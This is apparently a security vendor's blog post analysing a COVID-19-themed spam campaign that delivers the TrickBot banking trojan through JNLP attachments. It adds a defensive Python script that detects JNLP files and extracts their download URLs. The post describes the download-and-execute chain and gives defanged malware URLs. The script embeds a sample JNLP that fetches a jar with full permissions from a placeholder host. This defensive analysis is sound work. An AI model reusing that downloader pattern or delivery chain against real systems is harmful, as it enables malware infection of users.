Cybercriminals are constantly exploiting the Coronavirus (COVID-19) pandemic. While monitoring COVID-19-themed spam, we recently noticed one interesting campaign that uses an unusual email attachment to deliver the TrickBot malware.
Figure 1: The spam campaign flow
The Road to TrickBot
The email, claiming to be from a volunteer organization that helps people seeking COVID-19 financial assistance, entices the recipient to open the attachments – fake COVID-19 forms.
Figure 2: Trustwave Secure Email Gateway showing a recent COVID-19 spam
The attachments are Java Network Launch Protocol (JNLP) files. A JNLP file is an XML document that tells Java Web Start which Java program to fetch from a remote server and run on the client machine. If the client has a Java Runtime Environment (JRE) installed that still bundles Java Web Start, a JNLP file can be executed with a double click, since the file extension is associated with the Web Start launcher. (Oracle shipped Java Web Start with Java 8 but removed it from Java 11 onwards, so this delivery chain only works on hosts running an older JRE.)
In Figure 2, the two JNLP attachments are identical. Once executed, they download and run the Java program "map.jar" hosted at "http[s]://mapcovid[.]net" – a second-stage downloader disguised as a COVID-19 "Map" Java program.
Figure 3: The attachment SARS-2_Form.jnlp, a fake COVID-19 form, is a downloader
Figure 4: The second-stage downloader "map.jar" will download and execute the main malware "map.exe"
The downloaded file "map.jar" opens the World Health Organization's (WHO) "Q&A on coronaviruses (COVID-19)" webpage as a decoy to cover up its real activity – downloading and installing the main malware. That payload, disguised as a COVID-19 "Map" executable, is downloaded from "http[s]://basecovid[.]com/map[.]exe" and then saved and executed as %appdata%\map.exe.
The second downloaded file, "map.exe", is the modular banking trojan known as TrickBot. This malware is prominent at the moment because of its wide range of functionality: information stealing, downloading of other malware, sending spam email, and so on.
The TrickBot binary %appdata%\map.exe is executed automatically by the Execute() function of "map.jar". Once running, it creates its installation folder, SpotifyMusic, inside the user's Startup folder and drops a copy of itself there, so it is relaunched at every logon. It also creates an encrypted file, "settings.ini", which holds the TrickBot configuration.
Figure 5: Installation path of the downloaded TrickBot
Figure 6: Decrypted TrickBot configuration
The decrypted TrickBot configuration contains the information the executable needs to talk to its command-and-control (C&C) servers. It includes the version of the currently installed "map.exe" and its group tag (gtag), the list of C&C IP addresses, and the first module that "map.exe" will download.
Figure 7: Memory dump of TrickBot "map.exe" showing the first request to its C&C
Malware authors continue to take advantage of the COVID-19 pandemic in their spam. Like other cybercriminals, the threat actors behind this TrickBot campaign are getting creative with the initial arrival vector of their malware. Usually we observe TrickBot delivered as the payload of malicious document attachments, particularly macro downloaders. This is the first time we have seen TrickBot use JNLP files as downloaders; in fact, the use of JNLP files as email attachments to deliver malware is uncommon in general.
It is likely we will see more of this kind of threat. We recommend blocking *.jnlp files at your email gateway, and, since the JNLP format is plain XML, inspecting attachment content rather than relying on the file extension alone. We have added protections for this threat to the Trustwave Secure Email Gateway for our customers.
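As an added example (not Trustwave's code, and not the contents of the actual SARS-2_Form.jnlp, which the post shows only as an image), the following Python script illustrates both the JNLP mechanics described earlier and the gateway recommendation above: it recognises a JNLP document by its `<jnlp>` root element regardless of file extension, and pulls out the URLs Java Web Start would contact (the `codebase` plus every `<jar href>`), the requested security level and the main class. The sample JNLP embedded in the script is constructed for illustration and uses the placeholder host `downloader.example`, not the campaign's real domain.

```python
"""Triage helper for JNLP email attachments (illustrative example, not Trustwave code).

A JNLP file is XML whose root element is <jnlp>. Java Web Start resolves the
codebase attribute plus each <jar href="..."> entry to decide what to fetch and
run, so a mail filter can identify a JNLP by content rather than by extension
alone, and can extract the download URLs as indicators.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlparse

# Constructed sample modelled on the campaign described in the post. The real
# attachment is not reproduced on the page; the host name below is a placeholder.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="https://downloader.example/" href="SARS-2_Form.jnlp">
  <information>
    <title>COVID-19 Map</title>
    <vendor>Volunteer Group</vendor>
  </information>
  <security>
    <all-permissions/>
  </security>
  <resources>
    <j2se version="1.6+"/>
    <jar href="map.jar" main="true"/>
  </resources>
  <application-desc main-class="map.Main"/>
</jnlp>
"""


def _local(tag: str) -> str:
    """Strip an XML namespace prefix such as '{http://...}jnlp' -> 'jnlp'."""
    return tag.rsplit("}", 1)[-1]


def is_jnlp(data: bytes) -> bool:
    """True if the bytes parse as XML whose root element is <jnlp>."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    return _local(root.tag) == "jnlp"


def extract_indicators(data: bytes) -> dict:
    """Return the URLs Java Web Start would fetch, plus simple risk flags."""
    root = ET.fromstring(data)
    if _local(root.tag) != "jnlp":
        raise ValueError("not a JNLP document")
    codebase = root.get("codebase", "")
    jar_urls = []
    all_permissions = False
    main_class = None
    for el in root.iter():
        name = _local(el.tag)
        if name in ("jar", "nativelib") and el.get("href"):
            # Relative hrefs are resolved against codebase, exactly as Web Start does.
            jar_urls.append(urljoin(codebase, el.get("href")))
        elif name == "all-permissions":
            all_permissions = True
        elif name in ("application-desc", "applet-desc") and el.get("main-class"):
            main_class = el.get("main-class")
    hosts = sorted({urlparse(u).hostname for u in jar_urls if urlparse(u).hostname})
    remote_code = any(urlparse(u).scheme in ("http", "https") for u in jar_urls)
    return {
        "codebase": codebase,
        "jar_urls": jar_urls,
        "hosts": hosts,
        "all_permissions": all_permissions,
        "main_class": main_class,
        # Remote jar + all-permissions is the shape of the campaign above: the
        # fetched code runs with full access to the host, no sandbox.
        "suspicious": all_permissions and remote_code,
    }


def gateway_verdict(filename: str, data: bytes) -> str:
    """Decision a mail filter could make: block on extension OR on content."""
    if filename.lower().endswith(".jnlp"):
        return "block: .jnlp extension"
    if is_jnlp(data):
        return "block: JNLP content under a different extension"
    return "allow"


if __name__ == "__main__":
    print(gateway_verdict("SARS-2_Form.jnlp", SAMPLE_JNLP))
    print(gateway_verdict("SARS-2_Form.xml", SAMPLE_JNLP))
    for key, value in extract_indicators(SAMPLE_JNLP).items():
        print(f"{key}: {value}")
```

The content check matters because the extension is only what the desktop uses to pick Java Web Start as the handler; a renamed JNLP still parses, and the `hosts` list gives the gateway something to feed into URL and DNS blocklists alongside the hashes below.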
Indicators of Compromise
SARS-2_Form.jnlp SHA1: 46576bfebaecaacc4600bba429016b0713238f52
map.jar SHA1: 0068154fbc4374642ebe50ac4f822c64b45635c8
map.exe SHA1: 55b031294ff24919547cfcb4fd4f10a02902ce3b